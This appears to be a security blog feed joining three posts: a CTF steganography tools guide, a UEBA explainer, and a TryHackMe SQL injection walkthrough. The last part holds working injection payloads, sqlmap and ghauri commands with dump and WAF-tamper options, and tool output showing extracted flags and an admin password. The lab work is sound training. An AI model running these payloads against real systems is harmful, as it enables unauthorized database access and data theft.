Welcome to this CTF Forensics Blog Series, where we explore various forensic techniques commonly encountered in cybersecurity competitions. In Capture The Flag (CTF) challenges, forensic tasks require participants to analyze digital artifacts, uncover hidden information, and extract valuable data using specialized tools and techniques. This series will cover key forensic topics, including Steganography, Network Analysis with Wireshark, PDF Analysis, and Disk Image Forensics, providing insights into how these methods are applied in real-world scenarios. In this first installment, well dive into Steganography, a fascinating technique used to embed hidden information within digital files such as images, audio, and video. By the end of this blog, youll have a strong understanding of steganographic methods, common CTF challenges, and the tools required to reveal hidden data.What is Steganography ?Steganography comes from the Greek words steganos (hidden) and graphein (writing), meaning hidden writing. It is a technique used to embed data within digital media in a way that is not immediately obvious. In CTF challenges, steganographic techniques are often used to hide flags inside images, audio files, or even within metadata. Unlike encryption, which scrambles data to protect its contents, steganography focuses on concealing the existence of the data itself. A seemingly normal image may contain a secret message hidden in its least significant bits (LSB), or an audio file might carry encoded text within its waveform. Without the right tools, these hidden messages remain undetected.Common Methods and Tools UsedStringsThe strings command is a simple yet powerful tool used to extract human-readable text from binary files. It scans a file for sequences of printable characters, making it useful for finding hidden messages in images, executables, and other binary files. In CTF challenges, strings is often the first tool used to check for embedded plaintext flags or hints inside a file.Common Commands:Extract all printable strings from a file:strings Image_nameFilter results to search for specific keywords (e.g., flag ):strings Image_name | grep "flag"Limit output to strings of at least a certain length (e.g., 6 characters):strings -n 6 Image_nameExifToolExifTool is a powerful metadata extraction tool that retrieves and modifies metadata from various file formats, including images, PDFs, and videos. In CTFs, metadata often contains hidden information such as author names, GPS coordinates, or even embedded messages. Its especially useful for analyzing JPEG, PNG, and PDF files where metadata manipulation is common.Common Commands:Display all metadata from a file:exiftool file_nameSearch for a specific keyword in metadata (e.g., Author):exiftool file_name | grep "Author"Hex AnalysisHex analysis is essential in CTF forensics to examine the raw hexadecimal representation of files. Many times, hidden data, embedded flags, or file signatures are visible only in hex format. By analyzing a files hexadecimal content, you can detect anomalies, uncover hidden messages, and even recover corrupted files.Common Tools for Hex AnalysisWindowsHxD WinHex 010 EditorLinux (CLI-Based Hex Editors)xxdhexdumpLinux (GUI-Based Hex Editors)Bless GHex These tools are mostly used by majority of people for analysis , Analysing is one of the important part where you can find some hidden data , files inside it like zip file inside it ,It is also used for Magic Bytes .Zstegzsteg is a powerful command-line tool designed to detect steganography in PNG and BMP files. It specializes in identifying Least Significant Bit (LSB) steganography, which is a common technique used to hide data in images. zsteg scans different color channels and bit planes, revealing hidden messages that may be embedded within an image.zsteg file.pngBinwalkbinwalk is a powerful tool used to analyze and extract embedded data from binary files. It is commonly used in CTF forensics challenges to uncover hidden files, compressed data, firmware images, and steganographic payloads within different file types. It works by scanning a file for signatures of known file types and can extract hidden contents automatically.Analyze a file for embedded databinwalk file_nameExtract hidden files automaticallybinwalk -e file_nameSteghideSteghide is a popular command-line tool used to hide and extract data from various types of files, such as JPEG, BMP, WAV, and AU. It supports both data hiding and extraction while providing an option to encrypt the hidden data using a passphrase. This makes it particularly useful in CTF challenges where flags or other data are concealed inside multimedia files.Hide a file inside an image (or audio file) with encryptionsteghide embed -cf cover_image.jpg -ef secret.txtExtract hidden data from a filesteghide extract -sf cover_image.jpgCheck if a file contains hidden datasteghide info cover_image.jpgStegsolveStegsolve is a Java-based tool used for analyzing images that may contain hidden information using steganographic techniques. It is particularly effective for analyzing images in which data may be concealed using methods like Least Significant Bit (LSB) manipulation. Stegsolve provides several filters and analysis modes that allow you to inspect various color channels, bit planes, and image manipulations to reveal hidden messages or patterns. Use File > Open to load image . Use the arrow to key analyse the Image.SigBitsSigbits is a tool used for analyzing the bit-level structure of files and uncovering hidden information. It is especially useful for identifying Least Significant Bit (LSB) steganography in images, as well as other types of data manipulation. Sigbits provides a convenient way to inspect and manipulate the individual bits of an image, revealing hidden messages or patterns that are embedded in the least significant bits of color channels or other parts of the file. This makes it an excellent tool for CTF challenges focused on steganography and forensics.Commonly Used Commands python sigBits.py -t=lsb -o=rgb -out=MyOutputFile -e=row MyInputFile.png python sigBits.py -t=LSB -o=BGR -e=column SomeImage.jpg python sigBits.py --type=Msb --order=GBR --extract=CoLuMn AnotherImage.png Download Link for all above mentioned ToolsTo get started with the tools mentioned in this blog, you can easily download and set them up from their official GitHub repositories. Each tools GitHub page provides clear installation instructions, including dependencies and setup steps for different operating systems. You can follow the provided tutorials to clone the repositories, compile the tools (if needed), and start using them for your forensic analysis tasks in CTF competitions.GitHub : https://github.com/Masked96Artist/Forensics-Tools-for-CTFStay Tuned for Part - 2

In todays rapidly evolving digital world, cyber threats are becoming more sophisticated by the day. Traditional security systems that rely on static rules often fall short when dealing with dynamic and unpredictable attacks. This is where User and Entity Behavior Analytics (UEBA) steps in, offering a smarter, behavior-based approach to detecting security threats. Think of it as having a vigilant security guard in your organization, continuously analyzing activities to spot anything unusual before its too late.In this blog, well dive into the fundamentals of UEBA, its components, real-world applications, and the benefits and challenges of implementing it. Plus, well explore practical insights to help you better understand how this cutting-edge technology can fortify your cybersecurity strategy.What Is UEBA?At its core, UEBA leverages machine learning (ML) and behavioral analytics to establish a baseline for normal behavior across users and entities in an organization. It then monitors for deviations from this baseline, flagging anything out of the ordinary that could indicate a security threat.Lets simplify it further: Imagine you work with a colleague who logs into the system at 9 AM daily and accesses specific files. One day, their account logs in at 3 AM from another country and downloads a massive amount of sensitive data. UEBA recognizes this as an anomaly and raises an alert. Unlike traditional security measures that might miss such subtle clues, UEBA focuses on behavior patterns, making it an indispensable tool for modern enterprises.The Evolution of Cybersecurity: Why UEBA MattersCybersecurity has come a long way from basic firewalls and antivirus software. While these tools still play a role, they primarily focus on known threats and rule-based detection. However, modern attackers have become adept at bypassing these systems through tactics like credential theft, insider threats, and malware-free attacks.This is where UEBA shines. By analyzing behavior rather than relying on predefined rules, it can detect threats that traditional tools might overlook. Its especially effective against:Insider Threats: Malicious or accidental actions by employees that compromise security.Credential Theft: When attackers use stolen login credentials to access sensitive systems.Automated Attacks: Abnormal behavior from bots, compromised devices, or servers.How UEBA Works: The Key ComponentsUEBA combines several components and processes to provide a comprehensive security framework. Lets break it down:Data CollectionTo establish a behavioral baseline, UEBA relies on data from various sources, such as:System logsNetwork trafficApplication usage patternsUser activity logsThe more data UEBA has, the better it can understand normal behavior and identify anomalies.Analytics Engines and Machine LearningOnce data is collected, UEBA uses machine learning algorithms to analyze it. These algorithms establish a baseline for what constitutes normal behavior in your organization. They can adapt over time, learning new patterns as the organization evolves.Continuous MonitoringUEBA continuously monitors your network, comparing real-time activities against the baseline. If it detects deviationslike unusual login times, excessive file downloads, or access from unexpected locationsit flags them for further investigation.Alerting and ResponseWhen an anomaly is detected, UEBA sends an alert to your security team. From there, security experts validate the alert and take appropriate actions, such as:Changing user permissionsIsolating compromised devicesInvestigating the root cause of the anomalyReal-World Applications of UEBAUEBA isnt just a theoretical concept; its actively used by organizations to address real-world challenges. Here are a few practical applications:Insider Threat DetectionInsider threatswhether malicious or accidentalare among the hardest to detect. UEBA analyzes behavioral patterns to spot unusual activities, like an employee accessing sensitive files theyve never touched before.Credential Theft PreventionIf an attacker steals an employees login credentials, UEBA can detect unusual activity, such as logins from unexpected locations or devices, and trigger an alert.Network SecurityUEBA monitors how users and entities interact with network resources. If a server suddenly starts communicating with unfamiliar devices, UEBA flags it as a potential threat.Cloud SecurityIn an era of remote work and cloud-based systems, UEBA helps secure cloud environments by monitoring user and entity behavior in real-time.Benefits of UEBAUEBA offers several advantages that make it an essential component of modern cybersecurity strategies:Proactive Threat Detection: Unlike traditional tools that react to known threats, UEBA identifies anomalies in real time, allowing you to address issues before they escalate.Regulatory Compliance: By maintaining detailed logs and conducting regular behavioral analysis, UEBA helps organizations meet compliance requirements like GDPR, HIPAA, and PCI-DSS.Reduced Human Error: Automation and AI minimize the risk of overlooking critical threats, ensuring a more robust security posture.Challenges of Implementing UEBAWhile UEBA is a powerful tool, its not without its challenges:False Positives: Sometimes, normal activities may be flagged as suspicious, leading to wasted time and resources.Implementation Complexity: Setting up UEBA requires expertise in machine learning and behavioral analytics, which may be daunting for smaller organizations.Data Privacy Concerns: Extensive data collection can raise privacy issues, making it crucial to balance security and ethical considerations.Real-World Case Study: Stopping a Data BreachLets consider a real-life scenario. A financial services company implemented UEBA to monitor employee behavior. One night, UEBA flagged unusual activity: an employees account was used to download large amounts of sensitive client data from an unfamiliar IP address. Upon investigation, the security team discovered the account had been compromised. Thanks to UEBA, the breach was stopped before any data was leaked.Future of UEBA: AI-Powered DefenseAs cyber threats continue to evolve, so does the technology used to combat them. The future of UEBA lies in its integration with advanced AI and predictive analytics. Emerging trends include:Integration with Zero Trust Models: UEBA complements Zero Trust by continuously validating user and entity behavior.Edge Computing: With data processing closer to the source, UEBA systems can deliver faster threat detection.Predictive Analytics: Beyond detecting anomalies, future UEBA systems will predict potential threats based on historical data.Practical Steps to Implement UEBAIf youre considering UEBA for your organization, heres a step-by-step guide:Identify Data Sources: Gather data from system logs, network traffic, and user activities.Choose the Right Tools: Select a UEBA platform that aligns with your organizations needs.Train Your Team: Ensure your security team understands how to interpret UEBA alerts.Monitor and Refine: Continuously update your UEBA system to adapt to new threats and organizational changes.Closing ThoughtsUEBA isnt just another buzzword in the cybersecurity world. Its a vital tool for detecting and mitigating modern threats. By focusing on behavior rather than predefined rules, UEBA provides a proactive and adaptive approach to security. Whether youre safeguarding sensitive data, meeting compliance standards, or staying ahead of sophisticated attackers, UEBA has you covered.Understanding the UEBA Framework Through the DiagramTo truly appreciate the power of User and Entity Behavior Analytics (UEBA), its essential to understand the ecosystem behind it. The diagram above provides a glimpse into a centralized-decentralized hybrid system that enables organizations to collect, analyze, and respond to anomalies in real time. Lets break it down step by step.1. User Authentication & Management: The Frontline DefenseEvery robust cybersecurity framework starts with securing the doorsand thats exactly what user authentication does. This component ensures that only authorized users can access the system. Think of it as your organizations security checkpoint, verifying identities before they step inside. But it doesnt stop there. Once a user is authenticated, their activities are tracked and aggregated, forming a data trail that feeds into the rest of the system. This step creates the foundation for UEBAs behavior-based analysis.2. Data Compilation and Encryption: Guarding the DataOnce user activities are authenticated, the next step is compiling and encrypting this data. Data compilation involves gathering information from various sources, such as user actions, network traffic, and system logs. Data encryption ensures that sensitive information remains secure, both during transit and storage. This is particularly crucial in preventing unauthorized access or data breaches. With UEBA, this encrypted data is analyzed to establish what constitutes normal behavior, paving the way for detecting anomalies.3. The Centralized Server: The Brain of the SystemThe centralized server is the systems brain, responsible for unifying data from all sources. It acts as the main hub where all the compiled data flows in for processing and analysis. Why is this central node important? Because it provides a big-picture view of your organizations behavior. By connecting to decentralized servers, it ensures that no unusual activity slips through the cracks, regardless of where it originates.4. Decentralized Servers: Local GuardiansImagine your organization as a bustling city with multiple neighborhoods. Each neighborhood (or department) has its own security teamthese are your decentralized servers. Decentralized servers work alongside clusters of computers, collecting localized data and feeding it back to the centralized server. This hybrid approach combines the scalability of decentralized systems with the efficiency of centralized analysis. Its like having security teams stationed in every corner, while still reporting back to the central headquarters.5. Clusters of Computers: Where the Action HappensClusters of computers represent the endpointswhere users and devices interact with the system. This is where the raw data originates: logins, file access, unusual requests, and more. The decentralized servers monitor these activities, ensuring that every piece of data is captured and analyzed. For example, if a server in a specific cluster suddenly starts communicating with an unknown device, this abnormal activity is flagged for further inspection.6. Machine Learning: Turning Data into InsightsHeres where the real magic happens. Once the data flows through the servers, machine learning algorithmslike decision trees and random forestscome into play. Decision Trees: Think of these as if-then decision-makers. They classify behavior into categories like normal or suspicious. Random Forests: These are more advanced, combining multiple decision trees to make better predictions. By using these algorithms, the system builds a baseline of normal behavior and identifies deviations that could signal threats, such as insider attacks or credential theft.7. Real-Time Alerts: The Systems SirenWhen an anomaly is detected, the system doesnt sit quietlyit raises an alert. This is where Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) come into play. For example, if the system notices unusual login times or massive file downloads from an unexpected location, it immediately notifies the security team. These alerts are actionable, enabling quick responses like: Locking the suspicious account Isolating a compromised device Launching an in-depth investigation 8. The Information Hub: Visualizing InsightsThe information hub is where all the action gets visualized. Its essentially a dashboard for your security team, displaying critical insights through graphs, trends, and reports. This interface makes it easier to track anomalies and respond effectively. Think of it as your organizations mission control, offering a real-time overview of whats happening across the network.9. Analysis and Reporting: Closing the LoopFinally, the system consolidates its findings into detailed reports. These reports are invaluable for understanding incidents, improving threat models, and meeting compliance standards like GDPR or HIPAA. By analyzing these reports, organizations can refine their UEBA systems, ensuring they stay ahead of evolving threats. Its a continuous feedback loop that strengthens your cybersecurity posture over time.Connecting It All Back to UEBAThe diagram perfectly illustrates the essence of UEBAa layered system that collects data, analyzes it with advanced algorithms, and responds to threats in real time. Heres how it aligns with the key principles of UEBA: Proactive Threat Detection: The system identifies anomalies before they escalate. Scalability: With decentralized servers and clusters, it adapts to organizations of any size. Behavior-Based Monitoring: By focusing on behavior rather than static rules, it detects threats traditional systems often miss. In short, the framework combines technology, intelligence, and automation to deliver a powerful, future-ready cybersecurity strategy.Final ThoughtsUnderstanding UEBA through this diagram provides a deeper appreciation of its potential. Its not just a tool; its a comprehensive strategy for staying ahead of modern cyber threats. Whether youre dealing with insider threats, credential theft, or abnormal network behavior, UEBA ensures youre always one step ahead. This hybrid approach of centralized and decentralized systems, powered by machine learning, is the key to building a resilient defense. So, the next time you think about fortifying your cybersecurity strategy, remember: UEBA isnt just about detecting threatsits about preventing them before they even happen.

IntroductionUnderstanding SQL InjectionA web application becomes vulnerable to SQL injection attacks when attackers perform malicious manipulation of the SQL queries it runs. An improper input validation and sanitization practice creates vulnerabilities through which attackers gain access. Attackers can exploit this vulnerability to:The attacker can extract sensitive database contents through the this vulnerability. Through this vulnerability, if executed successfully an attacker can perform the following actions:Modify or delete records: The successful violation of database administrative operations serves attackers to enact administrative tasks on the database.Bypass authentication mechanismsTypes of SQL InjectionIn-band SQL Injection: Attackers accomplish both attack initiation and result acquisition through a single communication method (error-based or union-based).Blind SQL Injection: Attackers extract unseen query outputs but interpret information through application behavioral patterns (such as boolean indicators).Out-of-band SQL Injection: Transmission takes place over separate data channels since the attacker conducts their communication through HTTP requests.Tools Discussed in this blog are:HBSQLIGhauriSqlmapHeader-Based SQL Injection Automation with HBSQLIHaving a tool like HBSQLI makes testing for Header Based SQL Injection (HBSQLI) vulnerabilities easily and manually. This is an awesome automated command line tool that will solve the problem of detecting Header Based Blind Sql Injection vulnerabilities like never before.Why HBSQLI?HBSQLI automates the task of testing HTTP headers for injection points creating a much simpler process with less manual work and being more accurate than before. It supports the testing of 1+ URLs that can be customized through payloads and headers. Additionally, it offers two modes:Verbose mode: Displays the entire testing process step-by-step.Non-verbose mode: It only prints out vulnerable URLs, as a cleaner output.Getting Started with HBSQLITo install HBSQLI, follow these steps:git clone https://github.com/SAPT01/HBSQLI.git cd HBSQLI pip3 install -r requirements.txt For testing, you can either provide a single URL or a list of URLs:Single URL example:python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -vList of URLs example:python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -vMake a small note though, you can then test various headers and various different payloads, as long as you tell it that you are explicitly mentioning it.Customization TipsIf needed, use your own payloads or headers but their payloads should include a delay of 30 seconds to pick up on time based responses effectively. Change the header file such that your targets testing requirements are met. How to use automation tools to exploit SQL injectionLab URL : https://tryhackme.com/r/room/sqhellWe can theoretically explain all the command flag that sqlmap or ghauri tool uses, but this is not the aim for this blog. You can always read blogs, wiki and github repo for tool usage. The best way to learn something in my humble opinion is to learn it practically through a bit of struggling so lets use automated tool to try and solve this lab.Before we start, if this is your first time learning and using tools like sqlmap, I highly recommend to be familiar and comfortable with using burp suite requests and pass into sqlmap. Though it sounds complicated its an really easy and simple process, and the way to learn is via demonstration, and since it hard to read and follow along, video tutorial works the best. Feel free to check the following video. Flag 1:The first challenge we are presented with login page. Our first idea is to use sql auth bypass payloads . Lets fuzz and find any of the valid payloads. Some of the payloads that work are: ' or 1=1 limit 1 -- -+admin' or 1=1;-- - The sqlmap equivalent of this command and this process would be something like the following.sqlmap -u http://10.10.X.X/login --method=POST --data=username=admin&password=admin -p username,password --risk=3 --level=3 --random-agentNow here in the above command we are specifying the target URL with -u and then we are explicitly mentioning the type of request that the login form is using, which is POST. Now we are passing the POST parameters in the --data flag which are username and password. According to google we increase the level of risk cautiously and you might want to double check and reconsider before you try this on the real world engagement.The higher the value, the greater the number of payloads injected by sqlmap, but also the greater the risk. Depending on the location of the injection in the original SQL query,**increasing the risk can lead to unwanted data modifications**. By default, this value is set to 1.Flag 2:Now for the second flag we are asked to check and visit terms and conditions page this page at first glances looks like the below. Here we see that it says this web page logs our IP. Googling with terms like log IP address we find nothing helpful, so we dig a bit deeper and use search terms like logging IP address of website and it takes us to complete whole different topics. Now if we google with this search term called logging client IP we see an stackoverflow article which talks about X FORWARDED-FOR, and maybe this is helpful in solving this task.HTTP requests use headers to transmit client IP information within setups which use proxies or load balancers. Some good examples are:X-Forwarded-For: This header reveals the first IP of the requesting client when proxies exist between them and the website.X-Originating-IP: The same as X-Forwarded-For though sometimes email servers implement it to track original sender IPs.X-Remote-IP: The logging method shows the clients IP address which appears to the intermediary server.X-Remote-Addr: This intermediate-server logging protocol provides for recording the remote clients address during communication.X-Forwarded-Host: This header maintains the unmodified Host valueeioth request which proxies administer.Header information remains trustworthy based on server side verification because attackers can modify these headers. Now lets fire up our sqlmap and burp suite to get our second flag.We can use classic tool called sqlmap and in this blog we will outline how we can use ghauri as well. So brace yourself ghauri tool is amazing, its a bit faster than sqlmap and its payload processing is dope. You can check this tool from this link and yes installation steps are given in this linkSQLMAP Command:sqlmap -u "http://10.10.46.168/terms-and-conditions" --headers="X-forwarded-for:1*" --level=5 --dbms=mysql --threads 10 --dump-allGhauri Command:/home/mccleod via via v5.30.0 via via v3.8.10 via took 2s ghauri -u "http://10.10.46.168/terms-and-conditions" --headers="X-forwarded-for:1*" --level=5 --dbms=mysql --threads 10 --dump ________.__ .__ {1.3.1} / _____/| |__ _____ __ _________|__| / \ ___| | \\__ \ | | \_ __ \ | \ \_\ \ Y \/ __ \| | /| | \/ | \______ /___| (____ /____/ |__| |__| \/ \/ \/ https://github.com/r0oth3x49 An advanced SQL injection detection & exploitation tool. [*] starting @ 19:38:35 /2025-01-26/ custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y [19:38:38] [INFO] testing connection to the target URL Ghauri resumed the following injection point(s) from stored session: --- Parameter: X-forwarded-for (HEADER) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: X-forwarded-for: 1'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z --- SNIP'flag' in database 'sqhell_1' [19:58:48] [INFO] retrieved: 1dagt [20:14:04] [INFO] retrieved: THM{FLAG2:C678ABFE1C01FCA19E03901CEDAB1D15} [20:14:39] [INFO] retrieved: 1HM{FLAG2:C678ABFE1C01FCA19E03901CEDAB1D15} Database: sqhell_1 Table: flag [1 entries] +---------------------------------------------+----+ | flag | id | +---------------------------------------------+----+ | THM{FLAG2:C678ABFE1C01FCA19E03901CEDAB1D15} | 1 | +---------------------------------------------+----+ [20:14:39] [INFO] table 'sqhell_1.flag' dumped to CSV file '/home/mccleod/.ghauri/10.10.46.168/dump/sqhell_1/flag.csv' [20:14:39] [INFO] fetched data logged to text files under '/home/mccleod/.ghauri/10.10.46.168' [*] ending @ 20:14:39 /2025-01-26/Flag 3Flag 3 is my personal favourite one. This one taught and reminded me one of the basic things about web app pentesting which is to explore every single option and feature in the web application and we never know which feature might be vulnerable and which might give us an valid bug. While registering the user, we see that it validates if the user already exists or not. That looks really interesting, why dont we see how it looks in the burpsuite and what happens in the background. We fire up burp suite and we see that it takes us to an new endpoint. That looks a lot interesting, you can either save this request to a text file and then pass it through ghauri or sqlmap. Since this is an GET request, we can directly pass via -u parameter. Now since the database for the previous task was sqhell_2 lets specify the database for this situation so that we dont have to wait a lot to get our flag and in our case the flag with correct database looks like this -D sqhell_3./home/mccleod via via v5.30.0 via via v3.8.10 via took 1m12s ghauri -r username.req --level=5 --dbms=mysql --threads 10 --dump -D sqhell_3 ________.__ .__ {1.3.1} / _____/| |__ _____ __ _________|__| / \ ___| | \\__ \ | | \_ __ \ | \ \_\ \ Y \/ __ \| | /| | \/ | \______ /___| (____ /____/ |__| |__| \/ \/ \/ https://github.com/r0oth3x49 An advanced SQL injection detection & exploitation tool. [*] starting @ 20:35:49 /2025-01-26/ [20:35:49] [INFO] parsing HTTP request from 'username.req' custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y [20:35:53] [INFO] testing connection to the target URL Ghauri resumed the following injection point(s) from stored session: --- Parameter: username (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=' OR NOT 03031=3031-- wXyW Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: username='XOR(if(now()=sysdate(),SLEEP(6),0))XOR'Z [snip]+----+---------------------------------+----------+ | id | password | username | +----+---------------------------------+----------+ | 1 | icantrememberthispasswordcanyou | admin | +----+---------------------------------+----------+ [SNIP][20:37:26] [INFO] retrieved: 1 [20:37:42] [INFO] retrieved: THM{FLAG3:97AEB3B28A4864416718F3A5FAF8F308} [20:37:46] [INFO] retrieved: 1 Database: sqhell_3 Table: flag [1 entries] +---------------------------------------------+----+ | flag | id | +---------------------------------------------+----+ | THM{FLAG3:97AEB3B28A4864416718F3A5FAF8F308} | 1 | +---------------------------------------------+----+ [20:37:46] [INFO] table 'sqhell_3.flag' dumped to CSV file '/home/mccleod/.ghauri/10.10.46.168/dump/sqhell_3/flag.csv' [20:37:46] [INFO] fetched data logged to text files under '/home/mccleod/.ghauri/10.10.46.168' [*] ending @ 20:37:46 /2025-01-26/Flag 4:For this, we found an endpoint called /user which accepts id parameter. We tried using sqlmap and every tamper script that can possible be done on against the mysql database, but this did not work.sqlmap -u 'http://10.10.119.187/user?id=1*' --level=5 --dbms=mysql --threads 10 --dump -D sqhell_4 --random-agent --tamper=between,bluecoat,charencod e,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multip lespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versi onedkeywords,versionedmorekeywords,xforwardedfor -T users ___ __H__ ___ ___[,]_____ ___ ___ {1.8.4#stable} |_ -| . ['] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all ap plicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [snip] requests? [Y/n] y [22:14:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [22:14:19] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) [22:14:19] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-se c' (e.g. '--time-sec=2')Now I would certainly recommend to read more tamper scripts, which can be helpful in bypassing any of the web application firewalls. I was getting that the database called sqhell_4 was empty so we are out of luck and both ghauri and sqlmapresulted with the same message.With nothing left, we manually perform sql injection but this time we use order by payload to determine the number of columns, and if we get error then the number of columns database has are 4.order by 5; . This is an very important lesson and sometimes in real world automation might fail, or we might not know how to use them in that particular situation, hence we should accept the bitter truth that knowing how to use tools is not enough and tools are not an silver bullet that guarantees exploitation of sql injectionNow we use the following nested sql injection payload to get the flag.union all select "1 union select 1,flag,3,4 from flag-- -",1,2 from users# Flag 5:For the fifth flag, despite running ghauri twice I could not retrieve the full flag from the database. Ghauri did not yield positive results here is the command used.ghauri -u 'http://10.10.46.168/post?id=1*' --level=5 --dbms=mysql --threads 10 --dump -D sqhell_5 --batchBut with sqlmap I got flag instantly. Feel free to use --batch option in both sqlmap and in ghauri so that each time you dont have to manually enter yes or no option for each question that the tool asks you. Use this option cautiously./home/mccleod via via v5.30.0 via via v3.8.10 via sqlmap -u 'http://10.10.46.168/post?id=1*' --level=5 --dbms=mysql --threads 10 --dump -D sqhell_5 --batch ___ __H__ ___ ___["]_____ ___ ___ {1.8.4#stable} |_ -| . [(] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all ap plicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 20:55:37 /2025-01-26/ custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y [20:55:38] [INFO] testing connection to the target URL [snip] URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests: --- Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://10.10.46.168/post?id=1 AND 2267=2267 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: http://10.10.46.168/post?id=1 AND GTID_SUBSET(CONCAT(0x716b706a71,(SELECT (ELT(2776=2776,1))),0x716a766b71),2776) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: http://10.10.46.168/post?id=1;SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://10.10.46.168/post?id=1 AND (SELECT 9734 FROM (SELECT(SLEEP(5)))aKka) Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: http://10.10.46.168/post?id=-5001 UNION ALL SELECT NULL,CONCAT(0x716b706a71,0x73787449436e65436d48594e4b4c575542746369594450694f6e506a6d7a 4e51624452424957664f,0x716a766b71),NULL,NULL-- - --- [20:56:11] [INFO] the back-end DBMS is MySQL [20:56:12] [WARNING] potential permission problems detected ('command denied') web server operating system: Linux Ubuntu web application technology: Nginx 1.18.0 back-end DBMS: MySQL >= 5.6 [20:56:12] [INFO] fetching tables for database: 'sqhell_5' [20:56:12] [INFO] fetching columns for table 'flag' in database 'sqhell_5' [20:56:12] [INFO] fetching entries for table 'flag' in database 'sqhell_5' Database: sqhell_5 Table: flag [1 entry] +----+---------------------------------------------+ | id | flag | +----+---------------------------------------------+ | 1 | THM{FLAG5:B9C690D3B914F7038BA1FC65B3FDF3C8} | +----+---------------------------------------------+ [snip][20:56:14] [INFO] fetched data logged to text files under '/home/mccleod/.local/share/sqlmap/output/10.10.46.168' Key Features ComparisonWhen comparing Ghauri and SQLMap as tools for SQL injection detection and exploitation, several features highlight why Ghauri may be considered superior in certain contexts, particularly for automation.FeatureGhauriSQLMapInjection Types SupportedBoolean, Error, Time-based, Stacked QueriesFull support for blind SQL injection techniquesRequest TypesGET, POST, Headers, Cookies, Multipart, JSONPrimarily GET and POSTProxy SupportYesYesSession ManagementSupports session flushing and resumingLimited session managementUser-Agent HandlingAutomatically handles user-agent issuesRequires manual specification of random agentsSpeed of DetectionFaster in some cases with less false positivesSlower in certain conditionsCustomization OptionsExtensive options for limiting data extractionHighly customizable but can be complexEase of UseUser-friendly with straightforward commandsPowerful but may require more expertiseWhy Ghauri May Be Better for SQLMap AutomationThe use of Ghauri appears advantageous above SQLMap automation primarily because of its enhanced speed.Speed and Efficiency: Independent research shows that Ghauri manages to identify vulnerabilities more swiftly than SQLMap operates within specific testing environments. The effectiveness of Ghauri in detecting exploits exceeds SQLMaps limitations especially when SQLMap fails as shown through demonstrations presented.User-Agent Management: Ghauri provides automatic management of user-agent strings as a vital component for defending against web application firewalls (WAFs). SQLMap needs users to define their own random user-agent because WAF systems like CloudFlare can detect and block them.Versatile Injection Support: The wider injection type compatibility of Ghauri through its support for JSON and multipart form data grants better applicability across different web application structures than SQLMap which primarily targets GET and POST requests.Session Handling: Through its improved session handling Ghauri enables users to clear sessions and restore previously established connections. The system helps testers reduce their testing durations when running long evaluations.False Positives: Based on user feedback Ghauri demonstrates better performance by showing fewer erroneous results than the SQLMap tool. Reliability sustains the testing procedure since reduced nagging demands for extensive result validation.Taking sql injection beyond this blog Now if you look carefully all the commands and everything we have ever talked about sqlmap or ghauri or tools like bbsqli its all a reference of collection of CLI commands that worked once or few times in a particular situation. Now mind you real world is often cruel, harder and often unforgiving and always the plan does not go as expected. So if you are thinking just learning few commands from online resources about these cool tools will get you bounties or web application vulnerability findings then you are mistaken my friend. Its often frustrating, and it is either hit or miss, and these tools or the knowledge we have discussed on the blog might fall short when it comes to building competence in the area of web pentesting. So whats our best chances and what can we do to improve our knowledge and skill in the domain of web pentesting?You can teach yourself, teach your friends that way you solidify what you have learnt, create blogs and content around the web pentest area, try out and play cool ctfs get stuck and learn along the way. But since the topic is about sql injection in particular, what can we do to learn and stay updated and to learn about the possibilities of new ways to use these amazing automation tools? There has to be a better and smarter approach right?You can try out these google dorks to read high quality blogs written by real bug bounty hunters. This is just the surface level.site: medium.com "sqlmap" "bug bounty"site: infosecwriteups.com "sqlmap" "bug bounty"site: medium.com "ghauri" "bug bounty"site: infosecwriteups.com "ghauri" "bug bounty"Make sure you try and experiment with words like bug bounty and bugbounty (yes try with space and without space in between words), also try with and without the use of double quotes. You will be surprised with the number of commands and tool usage ideas you will stumble across reading posts of other experienced bounty hunters.Some other good websites to learn about hacking are:https://www.hackingarticles.in/https://book.hacktricks.wiki/en/index.htmlSome good websites to practice web pentesting are:https://tryhackme.com/https://hackthebox.com (Both academy and labs)https://portswigger.net/web-security/all-topics (for learning all topics related to web pentesting)Now if you wish to get daily updates on newly released writeups and articles related to web pentest and 